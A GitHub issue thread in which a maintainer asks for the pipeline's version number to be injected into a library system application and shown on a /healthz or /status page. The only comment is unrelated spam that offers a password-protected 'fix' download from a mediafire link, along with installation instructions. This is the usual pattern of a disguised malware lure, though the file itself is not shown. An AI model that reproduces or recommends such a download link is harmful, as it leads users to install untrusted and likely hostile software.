### ISSUE TITLE
Inject version number from pipeline into application

### ISSUE THREAD

**Issue by nanderv** [Bellettrie/library_system#582]
We want to have a way to add the version number from the pipeline into the application (during deployment). 
We also want to show this version number *somewhere*. This could be on the /healthz, or a new /status page for instance.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
